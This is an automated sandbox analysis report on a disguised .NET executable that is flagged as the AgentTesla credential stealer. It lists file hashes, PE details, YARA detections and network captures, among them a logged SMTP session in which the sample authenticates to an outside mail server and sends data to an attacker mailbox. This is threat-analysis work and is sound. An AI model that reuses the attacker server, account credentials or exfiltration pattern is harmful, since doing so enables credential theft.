Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.233193874678061
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	AE-808_RAJEN.exe
File size:	865792
MD5:	208f2494a82c3b830d676c187e1f03d1
SHA1:	98f350298f0b61cfd94c73bca51ef61802188527
SHA256:	a659c50e03822cd595bf5d21007b2870fda97b6d4a5d3840d68bf8f333cc47ea
SHA512:	46ba20d289b65037851c5658d29a5325d90f9ede1310756750428e54befe6f45c5169e31581560899bc9e1d7c90b066493d2d4e0d2bbaccaae56103437837d63
SSDEEP:	12288:tcd3/l3lFULj81T1No2u2k8Iqpy5/N/MZBCs0vvG7PH71UF+Z:i9MLj8pLor2k8ISGVM2qqu
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P..X...........v... ........@.. ....................................@................................

File Icon


Icon Hash:	f0f06094c36ee8c2

Static PE Info

General
Entrypoint:	0x4c761e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6010BABF [Wed Jan 27 00:58:39 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc75cc	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc8000	0xd8c4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd6000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xc5624	0xc5800	False	0.678047122231	data	7.26312302148	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0xc8000	0xd8c4	0xda00	False	0.0875501720183	data	3.73503425467	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xd6000	0xc	0x200	False	0.044921875	data	0.0980041756627	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0xc8130	0xd228	data
RT_GROUP_ICON	0xd5358	0x14	data
RT_VERSION	0xd536c	0x36c	data
RT_MANIFEST	0xd56d8	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2018
Assembly Version	1.0.0.0
InternalName	XmlToFieldTypeMap.exe
FileVersion	1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName	BowenTheatre.Bookings
ProductVersion	1.0.0.0
FileDescription	BowenTheatre.Bookings
OriginalFilename	XmlToFieldTypeMap.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/27/21-15:19:45.470151	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49779	587	192.168.2.4	68.65.122.156

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 27, 2021 15:19:43.646884918 CET	49779	587	192.168.2.4	68.65.122.156
Jan 27, 2021 15:19:43.843363047 CET	587	49779	68.65.122.156	192.168.2.4
Jan 27, 2021 15:19:43.843628883 CET	49779	587	192.168.2.4	68.65.122.156
Jan 27, 2021 15:19:44.222095013 CET	587	49779	68.65.122.156	192.168.2.4
Jan 27, 2021 15:19:44.223944902 CET	49779	587	192.168.2.4	68.65.122.156
Jan 27, 2021 15:19:44.420578957 CET	587	49779	68.65.122.156	192.168.2.4
Jan 27, 2021 15:19:44.422414064 CET	49779	587	192.168.2.4	68.65.122.156
Jan 27, 2021 15:19:44.621649027 CET	587	49779	68.65.122.156	192.168.2.4
Jan 27, 2021 15:19:44.623871088 CET	49779	587	192.168.2.4	68.65.122.156
Jan 27, 2021 15:19:44.859030962 CET	587	49779	68.65.122.156	192.168.2.4
Jan 27, 2021 15:19:44.860151052 CET	49779	587	192.168.2.4	68.65.122.156
Jan 27, 2021 15:19:45.056664944 CET	587	49779	68.65.122.156	192.168.2.4
Jan 27, 2021 15:19:45.057215929 CET	49779	587	192.168.2.4	68.65.122.156
Jan 27, 2021 15:19:45.269867897 CET	587	49779	68.65.122.156	192.168.2.4
Jan 27, 2021 15:19:45.270452023 CET	49779	587	192.168.2.4	68.65.122.156
Jan 27, 2021 15:19:45.468225002 CET	587	49779	68.65.122.156	192.168.2.4
Jan 27, 2021 15:19:45.468254089 CET	587	49779	68.65.122.156	192.168.2.4
Jan 27, 2021 15:19:45.470150948 CET	49779	587	192.168.2.4	68.65.122.156
Jan 27, 2021 15:19:45.470417976 CET	49779	587	192.168.2.4	68.65.122.156
Jan 27, 2021 15:19:45.471302986 CET	49779	587	192.168.2.4	68.65.122.156
Jan 27, 2021 15:19:45.471447945 CET	49779	587	192.168.2.4	68.65.122.156
Jan 27, 2021 15:19:45.668231010 CET	587	49779	68.65.122.156	192.168.2.4
Jan 27, 2021 15:19:45.669059038 CET	587	49779	68.65.122.156	192.168.2.4
Jan 27, 2021 15:19:45.679378986 CET	587	49779	68.65.122.156	192.168.2.4
Jan 27, 2021 15:19:45.726330042 CET	49779	587	192.168.2.4	68.65.122.156

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 27, 2021 15:17:57.593713045 CET	63153	53	192.168.2.4	8.8.8.8
Jan 27, 2021 15:17:57.641669035 CET	53	63153	8.8.8.8	192.168.2.4
Jan 27, 2021 15:17:58.795239925 CET	52991	53	192.168.2.4	8.8.8.8
Jan 27, 2021 15:17:58.843216896 CET	53	52991	8.8.8.8	192.168.2.4
Jan 27, 2021 15:18:02.821556091 CET	53700	53	192.168.2.4	8.8.8.8
Jan 27, 2021 15:18:02.870661974 CET	53	53700	8.8.8.8	192.168.2.4
Jan 27, 2021 15:18:03.755052090 CET	51726	53	192.168.2.4	8.8.8.8
Jan 27, 2021 15:18:03.811577082 CET	53	51726	8.8.8.8	192.168.2.4
Jan 27, 2021 15:18:05.161515951 CET	56794	53	192.168.2.4	8.8.8.8
Jan 27, 2021 15:18:05.209764004 CET	53	56794	8.8.8.8	192.168.2.4
Jan 27, 2021 15:18:06.631035089 CET	56534	53	192.168.2.4	8.8.8.8
Jan 27, 2021 15:18:06.678890944 CET	53	56534	8.8.8.8	192.168.2.4
Jan 27, 2021 15:18:07.812458992 CET	56627	53	192.168.2.4	8.8.8.8
Jan 27, 2021 15:18:07.863410950 CET	53	56627	8.8.8.8	192.168.2.4
Jan 27, 2021 15:18:08.591224909 CET	56621	53	192.168.2.4	8.8.8.8
Jan 27, 2021 15:18:08.643161058 CET	53	56621	8.8.8.8	192.168.2.4
Jan 27, 2021 15:18:09.889314890 CET	63116	53	192.168.2.4	8.8.8.8
Jan 27, 2021 15:18:09.937233925 CET	53	63116	8.8.8.8	192.168.2.4
Jan 27, 2021 15:18:11.132914066 CET	64078	53	192.168.2.4	8.8.8.8
Jan 27, 2021 15:18:11.194746971 CET	53	64078	8.8.8.8	192.168.2.4
Jan 27, 2021 15:18:13.166769981 CET	64801	53	192.168.2.4	8.8.8.8
Jan 27, 2021 15:18:13.215075970 CET	53	64801	8.8.8.8	192.168.2.4
Jan 27, 2021 15:18:13.974270105 CET	61721	53	192.168.2.4	8.8.8.8
Jan 27, 2021 15:18:14.024561882 CET	53	61721	8.8.8.8	192.168.2.4
Jan 27, 2021 15:18:15.163275957 CET	51255	53	192.168.2.4	8.8.8.8
Jan 27, 2021 15:18:15.224195004 CET	53	51255	8.8.8.8	192.168.2.4
Jan 27, 2021 15:18:21.854039907 CET	61522	53	192.168.2.4	8.8.8.8
Jan 27, 2021 15:18:21.904855013 CET	53	61522	8.8.8.8	192.168.2.4
Jan 27, 2021 15:18:26.373717070 CET	52337	53	192.168.2.4	8.8.8.8
Jan 27, 2021 15:18:26.431524992 CET	53	52337	8.8.8.8	192.168.2.4
Jan 27, 2021 15:18:42.282075882 CET	55046	53	192.168.2.4	8.8.8.8
Jan 27, 2021 15:18:42.330965042 CET	53	55046	8.8.8.8	192.168.2.4
Jan 27, 2021 15:18:42.974797010 CET	49612	53	192.168.2.4	8.8.8.8
Jan 27, 2021 15:18:43.031330109 CET	53	49612	8.8.8.8	192.168.2.4
Jan 27, 2021 15:18:43.608247995 CET	49285	53	192.168.2.4	8.8.8.8
Jan 27, 2021 15:18:43.657280922 CET	53	49285	8.8.8.8	192.168.2.4
Jan 27, 2021 15:18:43.794528008 CET	50601	53	192.168.2.4	8.8.8.8
Jan 27, 2021 15:18:43.845555067 CET	53	50601	8.8.8.8	192.168.2.4
Jan 27, 2021 15:18:44.122066021 CET	60875	53	192.168.2.4	8.8.8.8
Jan 27, 2021 15:18:44.175988913 CET	53	60875	8.8.8.8	192.168.2.4
Jan 27, 2021 15:18:44.639494896 CET	56448	53	192.168.2.4	8.8.8.8
Jan 27, 2021 15:18:44.689656973 CET	53	56448	8.8.8.8	192.168.2.4
Jan 27, 2021 15:18:45.217423916 CET	59172	53	192.168.2.4	8.8.8.8
Jan 27, 2021 15:18:45.270375013 CET	53	59172	8.8.8.8	192.168.2.4
Jan 27, 2021 15:18:45.823774099 CET	62420	53	192.168.2.4	8.8.8.8
Jan 27, 2021 15:18:45.882536888 CET	53	62420	8.8.8.8	192.168.2.4
Jan 27, 2021 15:18:46.688292980 CET	60579	53	192.168.2.4	8.8.8.8
Jan 27, 2021 15:18:46.747139931 CET	53	60579	8.8.8.8	192.168.2.4
Jan 27, 2021 15:18:47.333359957 CET	50183	53	192.168.2.4	8.8.8.8
Jan 27, 2021 15:18:47.391213894 CET	53	50183	8.8.8.8	192.168.2.4
Jan 27, 2021 15:18:47.769828081 CET	61531	53	192.168.2.4	8.8.8.8
Jan 27, 2021 15:18:47.820646048 CET	53	61531	8.8.8.8	192.168.2.4
Jan 27, 2021 15:18:48.325128078 CET	49228	53	192.168.2.4	8.8.8.8
Jan 27, 2021 15:18:48.376374960 CET	53	49228	8.8.8.8	192.168.2.4
Jan 27, 2021 15:18:59.790587902 CET	59794	53	192.168.2.4	8.8.8.8
Jan 27, 2021 15:18:59.838519096 CET	53	59794	8.8.8.8	192.168.2.4
Jan 27, 2021 15:18:59.903474092 CET	55916	53	192.168.2.4	8.8.8.8
Jan 27, 2021 15:18:59.953564882 CET	53	55916	8.8.8.8	192.168.2.4
Jan 27, 2021 15:19:02.797210932 CET	52752	53	192.168.2.4	8.8.8.8
Jan 27, 2021 15:19:02.858230114 CET	53	52752	8.8.8.8	192.168.2.4
Jan 27, 2021 15:19:33.748116016 CET	60542	53	192.168.2.4	8.8.8.8
Jan 27, 2021 15:19:33.798858881 CET	53	60542	8.8.8.8	192.168.2.4
Jan 27, 2021 15:19:35.795480013 CET	60689	53	192.168.2.4	8.8.8.8
Jan 27, 2021 15:19:35.856194019 CET	53	60689	8.8.8.8	192.168.2.4
Jan 27, 2021 15:19:43.481662989 CET	64206	53	192.168.2.4	8.8.8.8
Jan 27, 2021 15:19:43.538068056 CET	53	64206	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 27, 2021 15:19:43.481662989 CET	192.168.2.4	8.8.8.8	0x4659	Standard query (0)	server116.web-hosting.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 27, 2021 15:19:43.538068056 CET	8.8.8.8	192.168.2.4	0x4659	No error (0)	server116.web-hosting.com		68.65.122.156	A (IP address)	IN (0x0001)

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jan 27, 2021 15:19:44.222095013 CET	587	49779	68.65.122.156	192.168.2.4	220-server116.web-hosting.com ESMTP Exim 4.93 #2 Wed, 27 Jan 2021 09:19:44 -0500 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Jan 27, 2021 15:19:44.223944902 CET	49779	587	192.168.2.4	68.65.122.156	EHLO 571345
Jan 27, 2021 15:19:44.420578957 CET	587	49779	68.65.122.156	192.168.2.4	250-server116.web-hosting.com Hello 571345 [84.17.52.74] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Jan 27, 2021 15:19:44.422414064 CET	49779	587	192.168.2.4	68.65.122.156	AUTH login Ymx1ZXpsb2dAaGlzZW5zZXRlY2guZ3E=
Jan 27, 2021 15:19:44.621649027 CET	587	49779	68.65.122.156	192.168.2.4	334 UGFzc3dvcmQ6
Jan 27, 2021 15:19:44.859030962 CET	587	49779	68.65.122.156	192.168.2.4	235 Authentication succeeded
Jan 27, 2021 15:19:44.860151052 CET	49779	587	192.168.2.4	68.65.122.156	MAIL FROM:<bluezlog@hisensetech.gq>
Jan 27, 2021 15:19:45.056664944 CET	587	49779	68.65.122.156	192.168.2.4	250 OK
Jan 27, 2021 15:19:45.057215929 CET	49779	587	192.168.2.4	68.65.122.156	RCPT TO:<bluez@hisensetech.gq>
Jan 27, 2021 15:19:45.269867897 CET	587	49779	68.65.122.156	192.168.2.4	250 Accepted
Jan 27, 2021 15:19:45.270452023 CET	49779	587	192.168.2.4	68.65.122.156	DATA
Jan 27, 2021 15:19:45.468254089 CET	587	49779	68.65.122.156	192.168.2.4	354 Enter message, ending with "." on a line by itself
Jan 27, 2021 15:19:45.471447945 CET	49779	587	192.168.2.4	68.65.122.156	.
Jan 27, 2021 15:19:45.679378986 CET	587	49779	68.65.122.156	192.168.2.4	250 OK id=1l4lfd-003v8v-CQ

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: AE-808_RAJEN.exe PID: 6140 Parent PID: 4260

General

Start time:	15:18:01
Start date:	27/01/2021
Path:	C:\Users\user\Desktop\AE-808_RAJEN.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\AE-808_RAJEN.exe'
Imagebase:	0x670000
File size:	865792 bytes
MD5 hash:	208F2494A82C3B830D676C187E1F03D1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.654461075.0000000002B91000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.654506944.0000000002BCE000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.654789370.0000000003B99000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.654908714.0000000003C86000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: AE-808_RAJEN.exe PID: 2912 Parent PID: 6140

General

Start time:	15:18:04
Start date:	27/01/2021
Path:	C:\Users\user\Desktop\AE-808_RAJEN.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\AE-808_RAJEN.exe
Imagebase:	0xea0000
File size:	865792 bytes
MD5 hash:	208F2494A82C3B830D676C187E1F03D1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.1030691966.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.1032201040.0000000003341000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1032201040.0000000003341000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: AE-808_RAJEN.exe PID: 6140 Parent PID: 4260 AE-808_RAJEN.exeCOMMON

Executed Functions

Function 06500015, Relevance: 1.5, Instructions: 1481COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.657708553.0000000006500000.00000040.00000001.sdmp, Offset: 06500000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f91f7043b1f424efb2ef71fc2e28855db283e51be03fe41dcb3254e0953d2078
Instruction ID: 36f0207a1f3236133b0e52171f5f56b44042ccdf9229def642bbff4578f2d27b
Opcode Fuzzy Hash: f91f7043b1f424efb2ef71fc2e28855db283e51be03fe41dcb3254e0953d2078
Instruction Fuzzy Hash: 4BE2F870E04218DFEB68DFA0C990BEEB7B2BF84304F5085A5C545AB694DB319E85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 06508728, Relevance: 1.4, Strings: 1, Instructions: 170COMMON

Download Yara Rule

Strings

!, xrefs: 06509019

Memory Dump Source

Source File: 00000000.00000002.657708553.0000000006500000.00000040.00000001.sdmp, Offset: 06500000, based on PE: false

Similarity

API ID:
String ID: !
API String ID: 0-2657877971
Opcode ID: 2d0330668387f59b754895e11c9b79a79324cb1d269ca51cfb33b2840d5878a4
Instruction ID: c1b71295833e17afd0cb204f3faa626593781120ad8930764315c535b491fc46
Opcode Fuzzy Hash: 2d0330668387f59b754895e11c9b79a79324cb1d269ca51cfb33b2840d5878a4
Instruction Fuzzy Hash: F571F574D00629CFEB64CF65C944BE9BBB2BF89304F1085EAD519A7281EB709AC5CF40

Uniqueness

Uniqueness Score: -1.00%

Function 06504180, Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.657708553.0000000006500000.00000040.00000001.sdmp, Offset: 06500000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a5b220260783b49dac575780dae6b1fb7b2889b1f382f0b9c48b8a7ff7e3729
Instruction ID: f5e9c400866d1fb0a4657f5a01d84aa985f685b25affab1aeea2925268affb08
Opcode Fuzzy Hash: 4a5b220260783b49dac575780dae6b1fb7b2889b1f382f0b9c48b8a7ff7e3729
Instruction Fuzzy Hash: EAB12670E00209DFEB50CFA9C8857EEBBF2BB88314F148529D915A7294EB74D885CF81

Uniqueness

Uniqueness Score: -1.00%

Function 06504A50, Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.657708553.0000000006500000.00000040.00000001.sdmp, Offset: 06500000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52e4cd1ebe5fb541e38f17f8b45d48fdeff12178dfca66f7af3f8ed45deea680
Instruction ID: b64016c2a0cdcfe5971dda9991955ef185ce82c788f70bd10ffd75cd5fb221f7
Opcode Fuzzy Hash: 52e4cd1ebe5fb541e38f17f8b45d48fdeff12178dfca66f7af3f8ed45deea680
Instruction Fuzzy Hash: 19B12571E00209CFEF50CFA9D8917AEBBF2BF88714F148529D915AB294EB74D845CB81

Uniqueness

Uniqueness Score: -1.00%

Function 05EB6290, Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.657489829.0000000005EB0000.00000040.00000001.sdmp, Offset: 05EB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c354dc6af3a1d4e251a5f5ad8410781ca1f78ac751be024077b00cfb4d8a939
Instruction ID: d68002a27a9ca96993e912387e258c2cf8c3ff81fac9240e095dfdfe02358f77
Opcode Fuzzy Hash: 3c354dc6af3a1d4e251a5f5ad8410781ca1f78ac751be024077b00cfb4d8a939
Instruction Fuzzy Hash: C5A103B0D05258CBEF04DFA9C4846EEBBF2BF88315F14A129E459AB345EB709985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05EB6280, Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.657489829.0000000005EB0000.00000040.00000001.sdmp, Offset: 05EB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4b3086a49dcda88eb2de8556eddede08032f6a08c52dbe0217ba454ba289556
Instruction ID: 116f91d286af916967fed13b867200a67ecaa11feed9ab71cc08db6bd0b448eb
Opcode Fuzzy Hash: e4b3086a49dcda88eb2de8556eddede08032f6a08c52dbe0217ba454ba289556
Instruction Fuzzy Hash: 398115B4D05218CFEF04CFA9C5446EEBBF2BB88315F14A129E449AB344EB749985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05EB8248, Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05EB847E

Memory Dump Source

Source File: 00000000.00000002.657489829.0000000005EB0000.00000040.00000001.sdmp, Offset: 05EB0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e4aa6222c58bb1f559ddbff9d5c812998963cd824fbf2151d313bfd51affe771
Instruction ID: f8fb5ca206a0d61bbb6f8cdb3867a7d146750b4259b81389ccfa9a12ad9ecd22
Opcode Fuzzy Hash: e4aa6222c58bb1f559ddbff9d5c812998963cd824fbf2151d313bfd51affe771
Instruction Fuzzy Hash: 36916B71D04219DFEB10CFA8C891BEEBBB6BF48305F048569D899A7340DBB49985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02A5BBC8, Relevance: 1.7, APIs: 1, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.654394096.0000000002A50000.00000040.00000001.sdmp, Offset: 02A50000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 1e5ee07235af2683a8c8fb016332f7165d8e6812a5a7c4d630a47430656c3665
Instruction ID: 45f71498da87b89726a2912722dd564dd4d6d498d91b48599b8f6adcae4fe6cd
Opcode Fuzzy Hash: 1e5ee07235af2683a8c8fb016332f7165d8e6812a5a7c4d630a47430656c3665
Instruction Fuzzy Hash: EA712870A00B158FD764DF2AC18075BB7F1BF88219F008A2DD986D7A44DB75E846CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02A5DBE0, Relevance: 1.7, APIs: 1, Instructions: 160COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02A5DD8A

Memory Dump Source

Source File: 00000000.00000002.654394096.0000000002A50000.00000040.00000001.sdmp, Offset: 02A50000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: dd5855b2b23e286c696633ac2468d2d76b7fc9c449f48fd3106efbae54602317
Instruction ID: d7ae38c103b68b7f346a307e65fcc5978c431f7f04700c371dbb120749e3abbc
Opcode Fuzzy Hash: dd5855b2b23e286c696633ac2468d2d76b7fc9c449f48fd3106efbae54602317
Instruction Fuzzy Hash: 516113B2C05348AFDF02CFA9C980ADEBFB1BF49314F14815AE818AB261D7759945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02A5B23C, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02A5DD8A

Memory Dump Source

Source File: 00000000.00000002.654394096.0000000002A50000.00000040.00000001.sdmp, Offset: 02A50000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 2b4dee846a6d7a6a007244bf46b32b0d4822256582322af61e978edaad70d2ba
Instruction ID: e8c9346994ca6b7337c17215d9483335f224f0435bb27128c11498ab8a65bb4f
Opcode Fuzzy Hash: 2b4dee846a6d7a6a007244bf46b32b0d4822256582322af61e978edaad70d2ba
Instruction Fuzzy Hash: 1851A0B1D00719EFDB15CFA9C884ADEBBB5BF48314F24812AE819AB210DB749945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02A56D49, Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02A56D86,?,?,?,?,?), ref: 02A56E47

Memory Dump Source

Source File: 00000000.00000002.654394096.0000000002A50000.00000040.00000001.sdmp, Offset: 02A50000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 5baaa3addc93870a3a8c59756a427e2a6f2538d31f51f1a40ca1b219d4716464
